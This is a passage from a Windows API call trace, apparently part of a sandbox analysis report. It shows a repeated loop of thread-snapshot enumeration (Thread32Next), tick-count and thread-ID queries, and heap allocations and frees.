0x751ab8 [0092.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.721] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.722] GetTickCount () returned 0x1172659 [0092.722] GetCurrentThreadId () returned 0x8c4 [0092.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.722] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.723] GetTickCount () returned 0x1172659 [0092.723] GetCurrentThreadId () returned 0x8c4 [0092.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.723] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.724] GetTickCount () returned 0x1172659 [0092.724] GetCurrentThreadId () returned 0x8c4 [0092.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.724] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.725] GetTickCount () returned 0x1172659 [0092.725] GetCurrentThreadId () returned 0x8c4 [0092.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.725] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.726] GetTickCount () returned 0x1172659 [0092.726] GetCurrentThreadId () returned 0x8c4 [0092.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.726] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.727] GetTickCount () returned 0x1172659 [0092.727] GetCurrentThreadId () returned 0x8c4 [0092.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.727] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.728] GetTickCount () returned 0x1172659 [0092.728] GetCurrentThreadId () returned 0x8c4 [0092.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.728] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.729] GetTickCount () returned 0x1172659 [0092.729] GetCurrentThreadId () returned 0x8c4 [0092.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.729] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.730] GetTickCount () returned 0x1172659 [0092.730] GetCurrentThreadId () returned 0x8c4 [0092.730] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.730] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.730] GetTickCount () returned 0x1172668 [0092.731] GetCurrentThreadId () returned 0x8c4 [0092.731] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.731] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.731] GetTickCount () returned 0x1172668 [0092.731] GetCurrentThreadId () returned 0x8c4 [0092.731] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.731] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.731] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.732] GetTickCount () returned 0x1172668 [0092.732] GetCurrentThreadId () returned 0x8c4 [0092.732] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.732] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.732] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.733] GetTickCount () returned 0x1172668 [0092.733] GetCurrentThreadId () returned 0x8c4 [0092.733] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.733] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.733] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.734] GetTickCount () returned 0x1172668 [0092.734] GetCurrentThreadId () returned 0x8c4 [0092.734] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.734] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.734] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.734] GetTickCount () returned 0x1172668 [0092.734] GetCurrentThreadId () returned 0x8c4 [0092.734] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.734] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.735] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.735] GetTickCount () returned 0x1172668 [0092.735] GetCurrentThreadId () returned 0x8c4 [0092.735] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.735] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.735] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.736] GetTickCount () returned 0x1172668 [0092.736] GetCurrentThreadId () returned 0x8c4 [0092.736] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.736] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.736] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.737] GetTickCount () returned 0x1172668 [0092.737] GetCurrentThreadId () returned 0x8c4 [0092.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.737] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.738] GetTickCount () returned 0x1172668 [0092.738] GetCurrentThreadId () returned 0x8c4 [0092.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.738] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.738] GetTickCount () returned 0x1172668 [0092.738] GetCurrentThreadId () returned 0x8c4 [0092.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.738] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.739] GetTickCount () returned 0x1172668 [0092.739] GetCurrentThreadId () returned 0x8c4 [0092.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.739] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.739] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.740] GetTickCount () returned 0x1172668 [0092.740] GetCurrentThreadId () returned 0x8c4 [0092.740] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.740] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.740] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.741] GetTickCount () returned 0x1172668 [0092.741] GetCurrentThreadId () returned 0x8c4 [0092.741] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.741] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.741] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.741] GetTickCount () returned 0x1172668 [0092.742] GetCurrentThreadId () returned 0x8c4 [0092.742] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.742] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.742] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.742] GetTickCount () returned 0x1172668 [0092.742] GetCurrentThreadId () returned 0x8c4 [0092.742] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.742] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.743] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.743] GetTickCount () returned 0x1172668 [0092.743] GetCurrentThreadId () returned 0x8c4 [0092.743] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.743] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.743] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.744] GetTickCount () returned 0x1172668 [0092.744] GetCurrentThreadId () returned 0x8c4 [0092.744] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.744] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.744] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.745] GetTickCount () returned 0x1172668 [0092.745] GetCurrentThreadId () returned 0x8c4 [0092.745] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.745] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.745] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.746] GetTickCount () returned 0x1172668 [0092.746] GetCurrentThreadId () returned 0x8c4 [0092.746] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.746] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.746] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.747] GetTickCount () returned 0x1172678 [0092.747] GetCurrentThreadId () returned 0x8c4 [0092.747] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.747] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.747] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.747] GetTickCount () returned 0x1172678 [0092.747] GetCurrentThreadId () returned 0x8c4 [0092.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.748] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.748] GetTickCount () returned 0x1172678 [0092.748] GetCurrentThreadId () returned 0x8c4 [0092.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.748] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.749] GetTickCount () returned 0x1172678 [0092.749] GetCurrentThreadId () returned 0x8c4 [0092.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.749] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.750] GetTickCount () returned 0x1172678 [0092.750] GetCurrentThreadId () returned 0x8c4 [0092.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.750] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.751] GetTickCount () returned 0x1172678 [0092.751] GetCurrentThreadId () returned 0x8c4 [0092.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.751] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.751] GetTickCount () returned 0x1172678 [0092.751] GetCurrentThreadId () returned 0x8c4 [0092.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.752] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.752] GetTickCount () returned 0x1172678 [0092.752] GetCurrentThreadId () returned 0x8c4 [0092.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.752] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.753] GetTickCount () returned 0x1172678 [0092.753] GetCurrentThreadId () returned 0x8c4 [0092.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.753] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.754] GetTickCount () returned 0x1172678 [0092.754] GetCurrentThreadId () returned 0x8c4 [0092.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.754] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.755] GetTickCount () returned 0x1172678 [0092.755] GetCurrentThreadId () returned 0x8c4 [0092.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.755] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.755] GetTickCount () returned 0x1172678 [0092.755] GetCurrentThreadId () returned 0x8c4 [0092.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.755] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.756] GetTickCount () returned 0x1172678 [0092.756] GetCurrentThreadId () returned 0x8c4 [0092.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.756] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.756] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.757] GetTickCount () returned 0x1172678 [0092.757] GetCurrentThreadId () returned 0x8c4 [0092.757] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.757] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.757] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.758] GetTickCount () returned 0x1172678 [0092.758] GetCurrentThreadId () returned 0x8c4 [0092.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.758] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.758] GetTickCount () returned 0x1172678 [0092.758] GetCurrentThreadId () returned 0x8c4 [0092.758] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.758] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.759] GetTickCount () returned 0x1172678 [0092.759] GetCurrentThreadId () returned 0x8c4 [0092.759] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.759] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.759] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.760] GetTickCount () returned 0x1172678 [0092.760] GetCurrentThreadId () returned 0x8c4 [0092.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.760] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.761] GetTickCount () returned 0x1172678 [0092.761] GetCurrentThreadId () returned 0x8c4 [0092.761] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.761] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.761] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.761] GetTickCount () returned 0x1172678 [0092.761] GetCurrentThreadId () returned 0x8c4 [0092.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.762] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.762] GetTickCount () returned 0x1172688 [0092.762] GetCurrentThreadId () returned 0x8c4 [0092.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.762] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.763] GetTickCount () returned 0x1172688 [0092.763] GetCurrentThreadId () returned 0x8c4 [0092.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.763] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.764] GetTickCount () returned 0x1172688 [0092.764] GetCurrentThreadId () returned 0x8c4 [0092.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.764] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.765] GetTickCount () returned 0x1172688 [0092.765] GetCurrentThreadId () returned 0x8c4 [0092.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.765] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.765] GetTickCount () returned 0x1172688 [0092.765] GetCurrentThreadId () returned 0x8c4 [0092.765] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.765] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.766] GetTickCount () returned 0x1172688 [0092.766] GetCurrentThreadId () returned 0x8c4 [0092.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.766] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.767] GetTickCount () returned 0x1172688 [0092.767] GetCurrentThreadId () returned 0x8c4 [0092.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.767] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.768] GetTickCount () returned 0x1172688 [0092.768] GetCurrentThreadId () returned 0x8c4 [0092.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.768] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.769] GetTickCount () returned 0x1172688 [0092.769] GetCurrentThreadId () returned 0x8c4 [0092.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.769] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.769] GetTickCount () returned 0x1172688 [0092.769] GetCurrentThreadId () returned 0x8c4 [0092.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.770] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.770] GetTickCount () returned 0x1172688 [0092.770] GetCurrentThreadId () returned 0x8c4 [0092.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.770] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.771] GetTickCount () returned 0x1172688 [0092.771] GetCurrentThreadId () returned 0x8c4 [0092.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.771] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.772] GetTickCount () returned 0x1172688 [0092.772] GetCurrentThreadId () returned 0x8c4 [0092.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.772] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.772] GetTickCount () returned 0x1172688 [0092.772] GetCurrentThreadId () returned 0x8c4 [0092.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.772] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.773] GetTickCount () returned 0x1172688 [0092.773] GetCurrentThreadId () returned 0x8c4 [0092.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.773] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.774] GetTickCount () returned 0x1172688 [0092.774] GetCurrentThreadId () returned 0x8c4 [0092.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.774] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.775] GetTickCount () returned 0x1172688 [0092.775] GetCurrentThreadId () returned 0x8c4 [0092.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.775] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.776] GetTickCount () returned 0x1172688 [0092.776] GetCurrentThreadId () returned 0x8c4 [0092.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.776] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.776] GetTickCount () returned 0x1172688 [0092.776] GetCurrentThreadId () returned 0x8c4 [0092.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.776] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.777] GetTickCount () returned 0x1172688 [0092.777] GetCurrentThreadId () returned 0x8c4 [0092.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.777] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.778] GetTickCount () returned 0x1172697 [0092.778] GetCurrentThreadId () returned 0x8c4 [0092.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.778] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.779] GetTickCount () returned 0x1172697 [0092.779] GetCurrentThreadId () returned 0x8c4 [0092.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.779] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.779] GetTickCount () returned 0x1172697 [0092.779] GetCurrentThreadId () returned 